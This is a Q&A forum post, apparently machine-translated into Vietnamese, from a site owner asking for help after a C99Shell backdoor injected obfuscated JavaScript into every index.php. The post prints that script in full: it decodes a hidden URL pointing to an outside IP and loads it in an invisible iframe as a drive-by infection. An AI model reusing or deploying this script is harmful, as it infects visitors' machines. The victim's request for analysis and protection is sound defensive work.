Trang web của tôi bị nhiễm vi rút trojan.Bảo vệ trang web từ Backdoor/PHP.C99Shell aka Trojan.Script.224490
Ai đó đã quản lý để tạo/tải lên tệp có tên "x76x09.php" hoặc "config.php" vào thư mục gốc của webspace của tôi. Kích thước của nó là 44287 byte và MD5 checksum của nó là 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. Những kết quả này nói rằng đó là "Backdoor/PHP.C99Shell" hoặc "Trojan.Script.224490".
Tệp này đã được thực hiện trong cùng thời điểm tệp được tạo. Vì vậy, nó phải đã xảy ra tự động. Tệp này đã thêm mã độc sau vào cuối mỗi index.php trên webspace của tôi.
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
Sau khi mã trên trang của tôi, người dùng báo cáo một bảng màu xanh bật lên trong Firefox. Nó yêu cầu họ cài đặt một plugin. Bây giờ một số người trong số họ có Exploit.Java.CVE-2010-0886.a trên PC của họ.
Sự lây nhiễm đã xảy ra mặc dù tôi đã allow_url_fopen và allow_url_include bị tắt. Và con heo của tôi nói rằng tập tin không được tải lên qua FTP.
Vì vậy, câu hỏi của tôi là:
- không mã độc hại làm gì? Nó được mã hóa như thế nào?
- Làm cách nào để tệp từ xa ("x76x09.php" hoặc "config.php") truy cập vào không gian web của tôi? SQL injection? Virus trên máy tính của riêng tôi?
- Tôi làm cách nào để bảo vệ trang web của mình khỏi các cuộc tấn công như vậy trong tương lai?
Cảm ơn bạn rất nhiều trước! Tôi thực sự cần giúp đỡ.
Mã được viết bằng JavaScript, thêm thẻ có liên quan. – Mchl